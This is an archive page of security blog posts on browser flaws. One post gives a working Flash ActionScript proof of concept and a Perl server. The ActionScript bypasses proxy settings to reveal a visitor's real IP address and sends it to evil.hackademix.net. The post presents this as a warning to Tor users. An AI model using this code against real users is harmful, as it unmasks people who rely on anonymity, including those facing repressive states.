Archive for the IE Category

12 05 2008

Who You Gonna Call?

Posted by: Giorgio in XSS, IE, Mozilla, Security, NoScript, Uncategorized

After hearing me crying for help, my friend Sirdarckcat went hunting and entrapped a poltergeist which haunts IE only.

Is it this the one Manuel Caballero was talking about?
Or was that a different cross-browser evilness?

However, I ain’t afraid of no ghosts :)

Comments 3 Comments »

09 05 2008

Misterious Ghost Stories

Posted by: Giorgio in IE, XSS, Mozilla, Security

Casper on PaypalI would be very interested in learning some technical details of Manuel Caballero’s talk at BlueHat, titled A Resident in My Domain, but so far news are very scarce, fragmented and contradictory.

Its abstract is intriguing:

A Resident in My Domain

Do you believe in ghosts? Imagine an invisible script that silently follows you while you surf, even after changing the URL 1,000 times and you are feeling completely safe. Now imagine that the ghost is able to see everything you do, including what you are surfing and what you are typing (passwords included), and even guess your next move.

No downloading required, no user confirmation, no ActiveX. In other words: no strings attached. We will examine the power of a resident script and the power of a global cross-domain. Also, we will go through the steps of how to find cross-domains and resident scripts.

Then we’ve got two quite reticent posts by Nate McFeters, who was there but pretends he doesn’t remember well enough and/or he can’t disclose such an atomic bomb ;)

There’s some discussion at TSSCI, but it adds more questions than answers: the article devises similarities with two distinct old and fixed bugs, the nastier affecting IE and the other Firefox; some comments speculate about an IE7 only, possibly patched, vulnerability; but why so much secretiveness if it was already fixed?
Nate, on the other hand, wrote that this is “a horribly serious issue that affects all browsers and is currently not fixed on any of them”.

Direct inquiries in security circles I’m member of did not bring anything less ectoplasmic on the table.

Therefore, all the juice we’ve got so far is a couple of photos authorizing only the following statements:

  1. It is scary.
  2. It has something to do with JavaScript and IFrames.
  3. It definitely works in IE7.

If you can summon anything useful, you’re very welcome!

Comments 7 Comments »

26 09 2007

Cross-Browser Proxy Unmasking

Posted by: Giorgio in IE, Anonymity, Flash, Java, Security, NoScript

It’s really time to sleep in my timezone, but I just couldn’t resist when I read latest RSnake’s post about Deanonymizing Tor and Detecting Proxies.

The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
So if you’re using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.

This caveat has been preached even on the Tor download page itself, but nothing better than some scary demos to convert the non believers.

RSnake’s interesting proof of concept exploits JavaScript + LiveConnect , and it apparently works on Gecko-based browser with Java™ installed only. I didn’t manage to make it work on Opera, even though it does support LiveConnect.

So I decided to defer bedtime a bit and I put together my own quick deanonymizing proof of concept, which relies on the almost ubiquitous Macromedia® Flash® and works in any web browser, like Internet Explorer, supporting the Flash player (no need for JavaScript, either).
The XMLSocket ActionScript object is used to bypass browser’s proxy setting and connect to a tiny server written in Perl, listening on port 9999 and echoing client’s IP.

Here’s the ActionScript code:

  1. var socket = new XMLSocket();
  2. socket.onConnect = function(success) {
  3. socket.onXML = function(doc) {
  4. getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
  5. doc.firstChild.firstChild.nodeValue);
  6. socket.close();
  7. };
  8. socket.send(new XML());
  9. };
  10. socket.connect("evil.hackademix.net", 9999);
Download this code: pbp.as

And here’s the Perl server:

  1. #!/usr/bin/perl -w
  2. use strict;
  3. use IO::Socket;
  4.  
  5. my $port = shift || 9999;
  6. my $sock = new IO::Socket::INET(
  7. LocalPort => $port,
  8. Proto => ‘tcp’,
  9. Listen => SOMAXCONN,
  10. Reuse => 1);
  11. $sock or die "socket: $!";
  12. my($new_sock, $c_addr, $buf);
  13. while (($new_sock, $c_addr) = $sock->accept())
  14. {
  15. my ($client_port, $client_ip) = sockaddr_in($c_addr);
  16. print $new_sock "<ip>" . inet_ntoa($client_ip) . "</ip>\000";
  17. $new_sock->close();
  18. }
Download this code: pbp.pl

Today’s lesson is: if you want to stay anonymous, you’d better turn off Java, Flash and any other plugin!

Update OCT-27

I’ve just learned that some months ago a guy called yawnmoth demonstrated an Unmasking Java Applet. Just like my Flash-based one, this works also in browsers, like IE, not supporting LiveConnect.
The lesson above obviously applies, even stronger.

Demos

Comments 17 Comments »

16 09 2007

IE’s “Non-Bug” Can Cost Your (Second)Life

Posted by: Giorgio in IE, Mozilla, Security

Very short summary:

  1. IE pwns Firefox and Mozilla blames Microsoft for not sanitizing URLs before throwing them at other applications.
  2. Firefox pwns… all the world and Mozilla recognizes the same bug that had been blamed on IE affects Firefox itself.
  3. Mozilla devs fix their bug immediately, while people like Alun Jones (Security Microsoft Valued Partner) and Markellos Diorinos (IE Product Manager) deny such a bug exists at all, thus IE won’t be fixed.
  5. Profit!

And this time I can’t even insert my usual NoScript plug ;)

Comments 8 Comments »

Bad Behavior has blocked 2343 access attempts in the last 7 days.